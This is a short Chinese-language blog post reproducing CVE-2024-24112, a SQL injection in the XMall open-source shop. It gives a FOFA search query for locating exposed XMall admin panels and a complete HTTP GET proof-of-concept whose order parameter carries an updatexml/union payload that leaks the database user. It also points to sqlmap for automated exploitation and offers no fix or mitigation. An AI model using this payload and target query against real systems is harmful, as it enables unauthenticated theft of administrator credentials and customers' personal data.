XMall 开源商城 SQL注入漏洞复现(CVE-2024-24112)

XMall 开源商城 SQL注入漏洞复现(CVE-2024-24112)

一、产品简介

XMal 开源电商商城 是开发者Exrick的一款基于SOA架构Q的分布式电商购物商城 前后端分离 前台商城:Vue全家桶 后台管理:Dubbo/SSM/Elasticsearch/Redis/MySQL/ActiveMQ/Shiro/Zookeeper等。

二、漏洞概述

XMal 开源商城 itemlist./itemvistSearch,/svslog,lorderlist,/memmberlist、/meberlistremove等多处接口存在SQL注入漏洞,未经身份验证的攻击者可以利用 SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

三、影响范围

四、复现环境

fofa:app="XMall-后台管理系统"

五、漏洞复现

POC

复制代码
GET /item/list?draw=1&order%5B0%5D%5Bcolumn%5D=1&order%5B0%5D%5Bdir%5D=desc)a+union+select+updatexml(1,concat(0x7e,user(),0x7e),1)%23;&start=0&length=1&search%5Bvalue%5D=&search%5Bregex%5D=false&cid=-1&_=1679041197136 HTTP/1.1
Host: your-ip
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,or;q=0.7
Connection: close

手动burp验证

可以看到已经爆出了数据库名字,当然可以利用sqlmap来实现

自动化验证

相关推荐
Cat God 00711 小时前
SQL使用及注意事项
数据库·sql·mysql
wanhengidc13 小时前
云手机 数据网络安全防护
安全·web安全
一岁天才饺子14 小时前
XSS挑战赛实战演练
前端·网络安全·xss
voltina14 小时前
【SQL】【事务】
数据库·sql
专业开发者14 小时前
近距离检测功能亮点
网络·tcp/ip·安全
是喵斯特ya14 小时前
java反序列化漏洞解析+URLDNS利用链分析
java·安全
他是龙55115 小时前
第40天:JavaEE安全开发SpringBoot JWT身份鉴权与打包部署(JAR&WAR)
spring boot·安全·java-ee
Hello.Reader16 小时前
Flink SQL Time Travel用 FOR SYSTEM_TIME AS OF 查询历史快照
大数据·sql·flink
测试人社区-千羽16 小时前
生物识别系统的测试安全性与漏洞防护实践
运维·人工智能·opencv·安全·数据挖掘·自动化·边缘计算